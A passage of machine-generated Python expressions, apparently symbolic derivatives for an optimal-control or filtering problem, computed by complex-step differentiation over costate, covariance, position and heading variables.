yb**2)) - lamP23_N*p12_n*p12_s*p13_n*p13_s*x_n**2*x_s**2/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP23_N*p12_n*p12_s*p13_n*p13_s*x_n*x_s*xb/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p12_n*p12_s*p13_n*p13_s*xb**2/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p12_n*p12_s*p23_n*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP23_N*p12_n*p12_s*p23_n*x_n*x_s*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP23_N*p12_n*p12_s*p23_n*xb*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p12_n*p12_s*p23_n*xb*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p13_n*p13_s*p22_n*p22_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP23_N*p13_n*p13_s*p22_n*p22_s*x_n*x_s*yb/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP23_N*p13_n*p13_s*p22_n*p22_s*xb*y_s*(1.0e-100*1j + y_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p13_n*p13_s*p22_n*p22_s*xb*yb/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p22_n*p22_s*p23_n*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP23_N*p22_n*p22_s*p23_n*y_s*yb*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP23_N*p22_n*p22_s*p23_n*yb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n**2*p13_s**2*x_n**2*x_s**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP33_N*p13_n**2*p13_s**2*x_n*x_s*xb/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n**2*p13_s**2*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP33_N*p13_n**2*p13_s**2*x_n*x_s*yb/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n**2*p13_s**2*xb**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP33_N*p13_n**2*p13_s**2*xb*y_s*(1.0e-100*1j + y_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n**2*p13_s**2*xb*yb/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP33_N*p13_n*p13_s*p23_n*p23_s*x_n*x_s*yb/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP33_N*p13_n*p13_s*p23_n*p23_s*xb*y_s*(1.0e-100*1j + y_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*xb*yb/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP33_N*p13_n*p13_s*p23_n*p23_s*y_s*yb*(1.0e-100*1j + y_n)/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*yb**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)))/1e-100),
(tf)*(-np.imag(Dt*lamP11_N*sigv**2*cos(theta_s*(1.0e-100*1j + theta_n))**2/p11_s + Dt*lamP12_N*sigv**2*sin(theta_s*(1.0e-100*1j + theta_n))*cos(theta_s*(1.0e-100*1j + theta_n))/p12_s + Dt*lamP22_N*sigv**2*sin(theta_s*(1.0e-100*1j + theta_n))**2/p22_s - 2*lamP11_N*p13_n*p13_s*v*sin(theta_s*(1.0e-100*1j + theta_n))/p11_s - lamP12_N*p13_n*p13_s*v*sin(theta_s*(1.0e-100*1j + theta_n))/p12_s + lamP12_N*p13_n*p13_s*v*cos(theta_s*(1.0e-100*1j + theta_n))/p12_s - lamP13_N*p33_n*p33_s*v*sin(theta_s*(1.0e-100*1j + theta_n))/p13_s + lamP22_N*p13_n*p13_s*v*cos(theta_s*(1.0e-100*1j + theta_n))/p22_s + lamP22_N*p23_n*p23_s*v*cos(theta_s*(1.0e-100*1j + theta_n))/p22_s + lamP23_N*p33_n*p33_s*v*cos(theta_s*(1.0e-100*1j + theta_n))/p23_s + lamX_N*v*cos(theta_s*(1.0e-100*1j + theta_n))/x_s + lamY_N*v*sin(theta_s*(1.0e-100*1j + theta_n))/y_s)/1e-100),
(tf)*(-np.imag(-lamP11_N*p11_s*x_n**2*x_s**2*(1.0e-100*1j + p11_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_s*x_n*x_s*xb*(1.0e-100*1j + p11_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p11_s*xb**2*(1.0e-100*1j + p11_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP11_N*p12_n*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p12_n*p12_s*x_n*x_s*yb*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p12_n*p12_s*xb*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP11_N*p12_n*p12_s*xb*yb*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_s*p12_n*x_n**2*x_s**2*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p11_s*p12_n*x_n*x_s*xb*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_s*p12_n*xb**2*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_s*p22_n*p22_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_s*p22_n*p22_s*x_n*x_s*yb*(1.0e-100*1j + p11_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p11_s*p22_n*p22_s*xb*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_s*p22_n*p22_s*xb*yb*(1.0e-100*1j + p11_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_s*p13_n*x_n**2*x_s**2*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p11_s*p13_n*x_n*x_s*xb*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_s*p13_n*xb**2*(1.0e-100*1j + p11_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_s*p23_n*p23_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p11_s*p23_n*p23_s*x_n*x_s*yb*(1.0e-100*1j + p11_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p11_s*p23_n*p23_s*xb*y_n*y_s*(1.0e-100*1j + p11_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_s*p23_n*p23_s*xb*yb*(1.0e-100*1j + p11_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
(tf)*(-np.imag(-2*lamP11_N*p11_n*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_n*p12_s*x_n*x_s*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p11_n*p12_s*xb*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP11_N*p11_n*p12_s*xb*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p12_s**2*y_n**2*y_s**2*(1.0e-100*1j + p12_n)**2/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP11_N*p12_s**2*y_n*y_s*yb*(1.0e-100*1j + p12_n)**2/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP11_N*p12_s**2*yb**2*(1.0e-100*1j + p12_n)**2/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*x_n**2*x_s**2*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p11_n*p11_s*x_n*x_s*xb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p11_n*p11_s*xb**2*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p12_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p12_s*x_n*x_s*yb*(1.0e-100*1j + p12_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP12_N*p12_s*xb*y_n*y_s*(1.0e-100*1j + p12_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_s*xb*yb*(1.0e-100*1j + p12_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p22_n*p22_s*y_n**2*y_s**2*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p22_n*p22_s*y_n*y_s*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p22_n*p22_s*yb**2*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_s*p13_n*x_n*x_s*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_s*p13_n*x_n*x_s*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_s*p13_n*xb*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_s*p13_n*xb*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_s*p23_n*p23_s*y_n**2*y_s**2*(1.0e-100*1j + p12_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p12_s*p23_n*p23_s*y_n*y_s*yb*(1.0e-100*1j + p12_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_s*p23_n*p23_s*yb**2*(1.0e-100*1j + p12_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p12_s**2*x_n**2*x_s**2*(1.0e-100*1j + p12_n)**2/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_s**2*x_n*x_s*xb*(1.0e-100*1j + p12_n)**2/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p12_s**2*xb**2*(1.0e-100*1j + p12_n)**2/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_s*p22_n*x_n*x_s*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_s*p22_n*x_n*x_s*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_s*p22_n*xb*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_s*p22_n*xb*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_s*p13_n*p13_s*x_n**2*x_s**2*(1.0e-100*1j + p12_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p12_s*p13_n*p13_s*x_n*x_s*xb*(1.0e-100*1j + p12_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_s*p13_n*p13_s*xb**2*(1.0e-100*1j + p12_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_s*p23_n*x_n*x_s*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_s*p23_n*x_n*x_s*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_s*p23_n*xb*y_n*y_s*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_s*p23_n*xb*yb*(1.0e-100*1j + p12_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
(tf)*(-np.imag(-2*lamP11_N*p13_s*v*(1.0e-100*1j + p13_n)*sin(theta_n*theta_s)/p11_s - lamP12_N*p13_s*v*(1.0e-100*1j + p13_n)*sin(theta_n*theta_s)/p12_s + lamP12_N*p13_s*v*(1.0e-100*1j + p13_n)*cos(theta_n*theta_s)/p12_s + lamP22_N*p13_s*v*(1.0e-100*1j + p13_n)*cos(theta_n*theta_s)/p22_s - lamP13_N*p11_n*p11_s*x_n**2*x_s**2*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p11_n*p11_s*x_n*x_s*xb*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*xb**2*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_n*p12_s*x_n*x_s*yb*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_n*p12_s*xb*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*xb*yb*(1.0e-100*1j + p13_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p13_s*x_n**2*x_s**2*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p12_n*p12_s*p13_s*x_n*x_s*xb*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p13_s*xb**2*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_s*p22_n*p22_s*x_n*x_s*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p13_s*p22_n*p22_s*x_n*x_s*yb*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p13_s*p22_n*p22_s*xb*y_n*y_s*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_s*p22_n*p22_s*xb*yb*(1.0e-100*1j + p13_n)/(Dt*p23_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s**2*x_n**2*x_s**2*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP33_N*p13_s**2*x_n*x_s*xb*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s**2*x_n*x_s*y_n*y_s*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_s**2*x_n*x_s*yb*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_s**2*xb**2*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_s**2*xb*y_n*y_s*(1.0e-100*1j + p13_n)**2/(Dt*p33_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + 